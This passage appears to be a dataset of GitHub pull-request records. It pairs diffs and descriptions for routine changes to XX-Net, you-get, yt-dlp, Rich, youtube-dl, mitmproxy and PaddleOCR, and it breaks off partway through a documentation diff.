11:39 AM Application: xxnet-1
11:39 AM Host: appengine.google.com
11:39 AM Rolling back the update.
2016-05-16 11:39:59,437 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:39:59,438 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:39:59,440 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:40:00,457 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:40:00,457 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:01 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
11:40 AM Application: xxnet-1
11:40 AM Host: appengine.google.com
11:40 AM Rolling back the update.
2016-05-16 11:40:00,539 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:40:00,542 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:40:00,543 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:40:01,441 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:40:01,441 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:02 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
2016-05-16 11:40:01,457 - root - INFO - =======================
2016-05-16 11:40:01,473 - root - INFO - Deploy failed appid list:
2016-05-16 11:40:01,473 - root - INFO - - xxnet-1
2016-05-16 11:40:01,473 - root - INFO - == END ==
```
| https://api.github.com/repos/XX-net/XX-Net/pulls/3401 | 2016-05-16T03:43:36Z | 2016-05-16T06:14:43Z | 2016-05-16T06:14:43Z | 2016-05-16T07:44:39Z | 123 | XX-net/XX-Net | 17,360 |
Add support for Bandcamp | diff --git a/src/you_get/common.py b/src/you_get/common.py
index e30b077cca..d8c5fa246d 100755
--- a/src/you_get/common.py
+++ b/src/you_get/common.py
@@ -1016,6 +1016,7 @@ def url_to_module(url):
alive,
archive,
baidu,
+ bandcamp,
baomihua,
bilibili,
blip,
@@ -1098,6 +1099,7 @@ def url_to_module(url):
'acfun': acfun,
'archive': archive,
'baidu': baidu,
+ 'bandcamp': bandcamp,
'baomihua': baomihua,
'bilibili': bilibili,
'blip': blip,
diff --git a/src/you_get/extractors/__init__.py b/src/you_get/extractors/__init__.py
index e460772b57..099c8dcfd4 100755
--- a/src/you_get/extractors/__init__.py
+++ b/src/you_get/extractors/__init__.py
@@ -4,6 +4,7 @@
from .alive import *
from .archive import *
from .baidu import *
+from .bandcamp import *
from .bilibili import *
from .blip import *
from .catfun import *
diff --git a/src/you_get/extractors/bandcamp.py b/src/you_get/extractors/bandcamp.py
new file mode 100644
index 0000000000..de21a590d6
--- /dev/null
+++ b/src/you_get/extractors/bandcamp.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+
+__all__ = ['bandcamp_download']
+
+from ..common import *
+
+def bandcamp_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
+ html = get_html(url)
+ trackinfo = json.loads(r1(r'(\[{"video_poster_url".*}\]),', html))
+ for track in trackinfo:
+ track_num = track['track_num']
+ title = '%s. %s' % (track_num, track['title'])
+ file_url = 'http:' + track['file']['mp3-128']
+ mime, ext, size = url_info(file_url)
+
+ print_info(site_info, title, mime, size)
+ if not info_only:
+ download_urls([file_url], title, ext, size, output_dir, merge=merge)
+
+site_info = "Bandcamp.com"
+download = bandcamp_download
+download_playlist = bandcamp_download
| Example links:
- http://flamingstream.bandcamp.com/track/zombie-massacre (single track)
- https://ninetreasuresband.bandcamp.com/album/arvan-ald-guulin-honshoor (album / playlist)
<!-- Reviewable:start -->
[<img src="https://reviewable.io/review_button.png" height=40 alt="Review on Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/707)
<!-- Reviewable:end -->
| https://api.github.com/repos/soimort/you-get/pulls/707 | 2015-10-18T03:14:03Z | 2015-10-18T03:24:36Z | 2015-10-18T03:24:36Z | 2015-10-18T03:24:57Z | 598 | soimort/you-get | 21,346 |
[rh/urllib] Simplify gzip decoding | diff --git a/yt_dlp/networking/_urllib.py b/yt_dlp/networking/_urllib.py
index 2c5f09872af..1ff7ccc6a6e 100644
--- a/yt_dlp/networking/_urllib.py
+++ b/yt_dlp/networking/_urllib.py
@@ -1,7 +1,6 @@
from __future__ import annotations
import functools
-import gzip
import http.client
import io
import socket
@@ -154,20 +153,9 @@ def brotli(data):
@staticmethod
def gz(data):
- gz = gzip.GzipFile(fileobj=io.BytesIO(data), mode='rb')
- try:
- return gz.read()
- except OSError as original_oserror:
- # There may be junk add the end of the file
- # See http://stackoverflow.com/q/4928560/35070 for details
- for i in range(1, 1024):
- try:
- gz = gzip.GzipFile(fileobj=io.BytesIO(data[:-i]), mode='rb')
- return gz.read()
- except OSError:
- continue
- else:
- raise original_oserror
+ # There may be junk added the end of the file
+ # We ignore it by only ever decoding a single gzip payload
+ return zlib.decompress(data, wbits=zlib.MAX_WBITS | 16)
def http_request(self, req):
# According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
| **IMPORTANT**: PRs without the template will be CLOSED
### Description of your *pull request* and other information
<!--
Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible
-->
This PR removes the try-and-fail approach for decoding gzip-compressed data. The old code decoded it with `GzipFile`, which fails when there is trailing junk because it tries to read the junk as another gzip member.
Instead we can use `zlib.decompress`, which only ever decodes a single data stream and ignores any trailing data.
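A standalone sketch of the behaviour this relies on (illustrative only, not part of the patch):

```python
# Illustrative only: decode a gzip payload that has junk appended to it.
import gzip
import zlib

payload = gzip.compress(b"hello world") + b"\x00trailing junk"

# wbits = MAX_WBITS | 16 means "expect a gzip header/trailer"; decoding
# stops after the first complete member, so the trailing junk is ignored.
print(zlib.decompress(payload, wbits=zlib.MAX_WBITS | 16))  # b'hello world'
```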
Refs:
- [`gzip.decompress`](https://docs.python.org/3/library/gzip.html#gzip.decompress)
- When the data is certain to contain only one member the [zlib.decompress()](https://docs.python.org/3/library/zlib.html#zlib.decompress) function with *wbits* set to 31 is faster.
- [`zlib.decompress`](https://docs.python.org/3/library/zlib.html#zlib.decompress)
- 16 + (8 to 15): Uses the low 4 bits of the value as the window size logarithm. The input must include a gzip header and trailer.
<details open><summary>Template</summary> <!-- OPEN is intentional -->
<!--
# PLEASE FOLLOW THE GUIDE BELOW
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x])
- Use *Preview* tab to see how your *pull request* will actually look like
-->
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check all of the following options that apply:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Fix or improvement to an extractor (Make sure to add/update tests)
- [ ] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy))
- [x] Core bug fix/improvement
- [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes))
<!-- Do NOT edit/remove anything below this! -->
</details><details><summary>Copilot Summary</summary>
<!--
copilot:all
-->
### <samp>🤖 Generated by Copilot at 8fa9675</samp>
### Summary
🚀🔧🗜️
<!--
1. 🚀 This emoji conveys the idea of speeding up or improving performance, which is one of the main goals of the change.
2. 🔧 This emoji suggests fixing or tweaking something, which is another aspect of the change, as it simplifies the code and removes an unnecessary dependency.
3. 🗜️ This emoji depicts a compression tool, which is related to the topic of gzip decompression. It could also imply reducing the size or complexity of something, which is another effect of the change.
-->
Improve gzip decompression performance in `yt_dlp.networking._urllib` module. Replace `gzip` module with `zlib` module and simplify `gz` method.
> _Sing, O Muse, of the swift and skillful coder_
> _Who in his wisdom sought to improve the gz method_
> _And with the aid of zlib, the mighty compression tool_
> _He freed the code from gzip, the slow and needless import_
### Walkthrough
* Simplify the `gz` method to use `zlib` instead of `gzip` for decompressing gzip responses ([link](https://github.com/yt-dlp/yt-dlp/pull/7611/files?diff=unified&w=0#diff-c7b2bfc3ad326c23db07694e9137f86e58e526681dab17e7680a968a7190e232L157-R158))
* Remove unused import of `gzip` module ([link](https://github.com/yt-dlp/yt-dlp/pull/7611/files?diff=unified&w=0#diff-c7b2bfc3ad326c23db07694e9137f86e58e526681dab17e7680a968a7190e232L4))
</details>
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/7611 | 2023-07-16T12:53:15Z | 2023-08-26T22:13:30Z | 2023-08-26T22:13:30Z | 2023-08-26T22:14:54Z | 351 | yt-dlp/yt-dlp | 7,847 |
Fix doc | diff --git a/docs/source/panel.rst b/docs/source/panel.rst
index b98af37b7..bbb938d72 100644
--- a/docs/source/panel.rst
+++ b/docs/source/panel.rst
@@ -9,7 +9,7 @@ To draw a border around any content, construct a :class:`~rich.panel.Panel` with
You can change the style of the panel by setting the ``box`` argument to the Panel constructor. See :ref:`appendix_box` for a list of available box styles.
-Panels will extend to the full width of the terminal. You can make panel *fit* the content why setting ``fit=True`` on the constructor, or by creating the Panel with :meth:`~rich.panel.Panel.fit`. For example::
+Panels will extend to the full width of the terminal. You can make panel *fit* the content by setting ``expand=False`` on the constructor, or by creating the Panel with :meth:`~rich.panel.Panel.fit`. For example::
from rich import print
from rich.panel import Panel
@@ -21,4 +21,4 @@ The Panel constructor accepts a ``title`` argument which will draw a title withi
from rich.panel import Panel
print(Panel("Hello, [red]World!", title="Welcome"))
-See :class:`~rich.panel.Panel` for details how to customize Panels.
\ No newline at end of file
+See :class:`~rich.panel.Panel` for details how to customize Panels.
| ## Type of changes
- [ ] Bug fix
- [ ] New feature
- [x] Documentation / docstrings
- [ ] Tests
- [ ] Other
## Checklist
- [ ] I've run the latest [black](https://github.com/ambv/black) with default args on new code.
- [ ] I've updated CHANGELOG.md and CONTRIBUTORS.md where appropriate.
- [ ] I've added tests for new code.
- [ ] I accept that @willmcgugan may be pedantic in the code review.
## Description
Fix #197
| https://api.github.com/repos/Textualize/rich/pulls/198 | 2020-08-01T12:01:18Z | 2020-08-01T12:24:21Z | 2020-08-01T12:24:21Z | 2020-08-01T12:24:21Z | 322 | Textualize/rich | 48,331 |
[twitch] Determine ids from URLs when extracting playlist | diff --git a/youtube_dl/extractor/twitch.py b/youtube_dl/extractor/twitch.py
index bf57eac01f2..f9164af098d 100644
--- a/youtube_dl/extractor/twitch.py
+++ b/youtube_dl/extractor/twitch.py
@@ -358,9 +358,16 @@ def _extract_playlist(self, channel_id):
break
offset += limit
return self.playlist_result(
- [self.url_result(entry) for entry in orderedSet(entries)],
+ [self._make_url_result(entry) for entry in orderedSet(entries)],
channel_id, channel_name)
+ def _make_url_result(self, url):
+ try:
+ video_id = 'v%s' % TwitchVodIE._match_id(url)
+ return self.url_result(url, TwitchVodIE.ie_key(), video_id=video_id)
+ except AssertionError:
+ return self.url_result(url)
+
def _extract_playlist_page(self, response):
videos = response.get('videos')
return [video['url'] for video in videos] if videos else []
| ### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [adding new extractor tutorial](https://github.com/rg3/youtube-dl#adding-support-for-a-new-site) and [youtube-dl coding conventions](https://github.com/rg3/youtube-dl#youtube-dl-coding-conventions) sections
- [x] [Searched](https://github.com/rg3/youtube-dl/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into youtube-dl each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Using the `--download-archive` parameter, youtube-dl can skip videos that it has already downloaded, as soon as it determines that the extractor and video ID match an existing video. For Twitch, the video ID for a VOD is determined as part of a JSON request in `_real_extract(...)`. However, the video ID can also be reliably determined from the URL; the ID is part of the URL, with a leading `v`. The Twitch extractor already relies on this behaviour for downloading rechat subtitles.
With this pull request, when extracting a playlist, the URL is checked against `_match_id(...)` for the VOD extractor. If it matches, we now return the video ID alongside the URL, so that the video can be skipped if desired without needing to make a JSON request. This makes it significantly faster to check for new videos on a channel, and reduces the number of API calls. If it turns out that a URL in the playlist does not match our expectations, we fall back to the old behaviour of simply returning the URL.
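For illustration, the URL-to-ID mapping this relies on looks roughly like the snippet below (a simplified, hypothetical regex; the actual change reuses `TwitchVodIE._match_id(...)` rather than rolling its own pattern):

```
import re

VOD_URL_RE = re.compile(r'https?://(?:www\.)?twitch\.tv/videos/(?P<id>\d+)')

def vod_archive_id(url):
    mobj = VOD_URL_RE.match(url)
    # the download archive stores Twitch VOD ids with a leading "v"
    return 'v%s' % mobj.group('id') if mobj else None

print(vod_archive_id('https://www.twitch.tv/videos/205683181'))  # -> 'v205683181'
```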
An excerpt from a download *without* this pull request (several seconds between each video):
```
...
[download] Downloading video 80 of 84
[twitch:vod] 204792451: Downloading vod info JSON
[twitch:vod] 204792451: Downloading vod access token
[twitch:vod] 204792451: Downloading m3u8 information
[download] Building the new Editing/Streaming/Gaming PC has already been recorded in archive
[download] Downloading video 81 of 84
[twitch:vod] 204821085: Downloading vod info JSON
[twitch:vod] 204821085: Downloading vod access token
[twitch:vod] 204821085: Downloading m3u8 information
[download] PC build, the final solution has already been recorded in archive
[download] Downloading video 82 of 84
[twitch:vod] 204850361: Downloading vod info JSON
[twitch:vod] 204850361: Downloading vod access token
[twitch:vod] 204850361: Downloading m3u8 information
[download] PC build, COMPLETE! (testing) has already been recorded in archive
[download] Downloading video 83 of 84
[twitch:vod] 207644374: Downloading vod info JSON
[twitch:vod] 207644374: Downloading vod access token
[twitch:vod] 207644374: Downloading m3u8 information
[download] pubg sQUADS has already been recorded in archive
[download] Downloading video 84 of 84
[twitch:vod] 212555204: Downloading vod info JSON
[twitch:vod] 212555204: Downloading vod access token
[twitch:vod] 212555204: Downloading m3u8 information
[download] PUBG XMAS has already been recorded in archive
```
And now, from a similar download *with* this pull request (near-instant):
```
...
[download] Downloading video 60 of 100
[download] v205683181 has already been recorded in archive
[download] Downloading video 61 of 100
[download] v207626842 has already been recorded in archive
[download] Downloading video 62 of 100
[download] v203168347 has already been recorded in archive
[download] Downloading video 63 of 100
[download] v205130464 has already been recorded in archive
[download] Downloading video 64 of 100
```
Finally, to demonstrate sane fallback to the old behaviour, if we simulate an error extracting the video ID by altering the code to pass a bad URL to `_match_id`, we get an excerpt like the following:
```
...
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/188047675
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187769206
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187452839
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187354420
[twitch:videos:past-broadcasts] Unable to match video ID from URL: https://www.twitch.tv/videos/187171654
[download] Downloading playlist: Coestar
[twitch:videos:past-broadcasts] playlist Coestar: Collected 100 video ids (downloading 100 of them)
[download] Downloading video 1 of 100
[twitch:vod] 213467862: Downloading vod info JSON
[twitch:vod] 213467862: Downloading vod access token
[twitch:vod] 213467862: Downloading m3u8 information
[download] Retro stuff: Jaguar, OSSC/Framemeister, and more (#StreamADay 1486) has already been recorded in archive
[download] Downloading video 2 of 100
[twitch:vod] 207973514: Downloading vod info JSON
[twitch:vod] 207973514: Downloading vod access token
[twitch:vod] 207973514: Downloading m3u8 information
[download] Checking out that NEW MAP (REAL) (#StreamADay 1466) has already been recorded in archive
...
``` | https://api.github.com/repos/ytdl-org/youtube-dl/pulls/15139 | 2018-01-02T00:21:22Z | 2018-01-03T09:22:55Z | 2018-01-03T09:22:55Z | 2018-01-03T09:22:55Z | 244 | ytdl-org/youtube-dl | 49,865 |
Fix failing unit tests caused by a69d223b | diff --git a/test/netlib/http/test_request.py b/test/netlib/http/test_request.py
index 7a6a9665c2..b4ecfd4ee9 100644
--- a/test/netlib/http/test_request.py
+++ b/test/netlib/http/test_request.py
@@ -138,8 +138,8 @@ def test_get_query(self):
def test_set_query(self):
request = treq(host=b"foo", headers = Headers(host=b"bar"))
request.query = ODict([])
- assert request.host == b"foo"
- assert request.headers["host"] == b"bar"
+ assert request.host == "foo"
+ assert request.headers["host"] == "bar"
def test_get_cookies_none(self):
request = treq()
@@ -188,8 +188,8 @@ def test_set_path_components(self):
request.path_components = []
assert request.path == "/"
request.query = ODict([])
- assert request.host == b"foo"
- assert request.headers["host"] == b"bar"
+ assert request.host == "foo"
+ assert request.headers["host"] == "bar"
def test_anticache(self):
request = treq()
| https://api.github.com/repos/mitmproxy/mitmproxy/pulls/949 | 2016-02-16T04:39:33Z | 2016-02-16T04:55:23Z | 2016-02-16T04:55:23Z | 2016-02-16T04:55:23Z | 265 | mitmproxy/mitmproxy | 27,982 |
|
word wrap code blocks | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 97b652247..fd5e4e843 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -20,6 +20,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Fixed exception in IPython when disabling pprint with %pprint https://github.com/willmcgugan/rich/issues/1646
- Fixed issue where values longer than the console width produced invalid JSON https://github.com/willmcgugan/rich/issues/1653
+## Changed
+
+- Markdown codeblocks now word-wrap https://github.com/willmcgugan/rich/issues/1515
+
## [10.12.0] - 2021-10-06
### Updated
diff --git a/rich/markdown.py b/rich/markdown.py
index 35ac28c1c..92d0d3c01 100644
--- a/rich/markdown.py
+++ b/rich/markdown.py
@@ -177,7 +177,7 @@ def __rich_console__(
) -> RenderResult:
code = str(self.text).rstrip()
syntax = Panel(
- Syntax(code, self.lexer_name, theme=self.theme),
+ Syntax(code, self.lexer_name, theme=self.theme, word_wrap=True),
border_style="dim",
box=box.SQUARE,
)
diff --git a/tests/test_log.py b/tests/test_log.py
index e0b4682e5..94a1f9e17 100644
--- a/tests/test_log.py
+++ b/tests/test_log.py
@@ -6,7 +6,8 @@
from rich.console import Console
-re_link_ids = re.compile(r"id=((\d+);(file:///(\w+\/)+(\w+\.py)(#\d+)?))\x1b")
+
+re_link_ids = re.compile(r"id=[\d\.\-]*?;.*?\x1b")
def replace_link_ids(render: str) -> str:
@@ -14,7 +15,7 @@ def replace_link_ids(render: str) -> str:
reproducible tests.
"""
- return re_link_ids.sub("id=0;file:///path/to/source.py#00\x1b", render)
+ return re_link_ids.sub("id=0;foo\x1b", render)
test_data = [1, 2, 3]
@@ -37,7 +38,7 @@ def render_log():
def test_log():
expected = replace_link_ids(
- "\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0m \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m32\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0mHello from \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m ! \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m33\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0m\x1b[1m[\x1b[0m\x1b[1;36m1\x1b[0m, \x1b[1;36m2\x1b[0m, \x1b[1;36m3\x1b[0m\x1b[1m]\x1b[0m \x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;file:///path/to/foo.py#00\x1b\\\x1b[2m34\x1b[0m\x1b]8;;\x1b\\\n \x1b[34m╭─\x1b[0m\x1b[34m───────────────────── \x1b[0m\x1b[3;34mlocals\x1b[0m\x1b[34m ─────────────────────\x1b[0m\x1b[34m─╮\x1b[0m \n \x1b[34m│\x1b[0m \x1b[3;33mconsole\x1b[0m\x1b[31m =\x1b[0m \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m \x1b[34m│\x1b[0m \n \x1b[34m╰────────────────────────────────────────────────────╯\x1b[0m \n"
+ "\x1b[2;36m[TIME]\x1b[0m\x1b[2;36m \x1b[0m \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m33\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0mHello from \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m ! \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m34\x1b[0m\x1b]8;;\x1b\\\n\x1b[2;36m \x1b[0m\x1b[2;36m \x1b[0m\x1b[1m[\x1b[0m\x1b[1;36m1\x1b[0m, \x1b[1;36m2\x1b[0m, \x1b[1;36m3\x1b[0m\x1b[1m]\x1b[0m \x1b]8;id=0;foo\x1b\\\x1b[2msource.py\x1b[0m\x1b]8;;\x1b\\\x1b[2m:\x1b[0m\x1b]8;id=0;foo\x1b\\\x1b[2m35\x1b[0m\x1b]8;;\x1b\\\n \x1b[34m╭─\x1b[0m\x1b[34m───────────────────── \x1b[0m\x1b[3;34mlocals\x1b[0m\x1b[34m ─────────────────────\x1b[0m\x1b[34m─╮\x1b[0m \n \x1b[34m│\x1b[0m \x1b[3;33mconsole\x1b[0m\x1b[31m =\x1b[0m \x1b[1m<\x1b[0m\x1b[1;95mconsole\x1b[0m\x1b[39m \x1b[0m\x1b[33mwidth\x1b[0m\x1b[39m=\x1b[0m\x1b[1;36m80\x1b[0m\x1b[39m ColorSystem.TRUECOLOR\x1b[0m\x1b[1m>\x1b[0m \x1b[34m│\x1b[0m \n \x1b[34m╰────────────────────────────────────────────────────╯\x1b[0m \n"
)
rendered = render_log()
print(repr(rendered))
| Fixes https://github.com/willmcgugan/rich/issues/1515 | https://api.github.com/repos/Textualize/rich/pulls/1655 | 2021-11-07T15:13:56Z | 2021-11-07T15:49:02Z | 2021-11-07T15:49:02Z | 2021-11-07T15:49:06Z | 2,365 | Textualize/rich | 48,193 |
[bugfix]fix bug about paddle.sum in rec_aster_loss.py | diff --git a/ppocr/losses/rec_aster_loss.py b/ppocr/losses/rec_aster_loss.py
index 52605e46db..9927fbc043 100644
--- a/ppocr/losses/rec_aster_loss.py
+++ b/ppocr/losses/rec_aster_loss.py
@@ -27,10 +27,9 @@ def __init__(self, margin=0.):
self.epsilon = 1e-12
def forward(self, x1, x2, target):
- similarity = paddle.sum(
- x1 * x2, dim=-1) / (paddle.norm(
- x1, axis=-1) * paddle.norm(
- x2, axis=-1) + self.epsilon)
+ similarity = paddle.sum(x1 * x2, axis=-1) / (paddle.norm(
+ x1, axis=-1) * paddle.norm(
+ x2, axis=-1) + self.epsilon)
one_list = paddle.full_like(target, fill_value=1)
out = paddle.mean(
paddle.where(
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/7537 | 2022-09-08T12:11:57Z | 2022-09-08T12:12:33Z | 2022-09-08T12:12:33Z | 2022-09-08T12:12:34Z | 237 | PaddlePaddle/PaddleOCR | 42,455 |
|
refine prune doc | diff --git a/deploy/slim/prune/README.md b/deploy/slim/prune/README.md
index 8ec5492cc9..ab731215a0 100644
--- a/deploy/slim/prune/README.md
+++ b/deploy/slim/prune/README.md
@@ -3,7 +3,8 @@
复杂的模型有利于提高模型的性能,但也导致模型中存在一定冗余,模型裁剪通过移出网络模型中的子模型来减少这种冗余,达到减少模型计算复杂度,提高模型推理性能的目的。
-本教程将介绍如何使用PaddleSlim量化PaddleOCR的模型。
+本教程将介绍如何使用飞桨模型压缩库PaddleSlim做PaddleOCR模型的压缩。
+PaddleSlim(项目链接:https://github.com/PaddlePaddle/PaddleSlim)集成了模型剪枝、量化(包括量化训练和离线量化)、蒸馏和神经网络搜索等多种业界常用且领先的模型压缩功能,如果您感兴趣,可以关注并了解。
在开始本教程之前,建议先了解
1. [PaddleOCR模型的训练方法](../../../doc/doc_ch/quickstart.md)
@@ -33,8 +34,20 @@ python setup.py install
### 3. 敏感度分析训练
-加载预训练模型后,通过对现有模型的每个网络层进行敏感度分析,了解各网络层冗余度,从而决定每个网络层的裁剪比例。
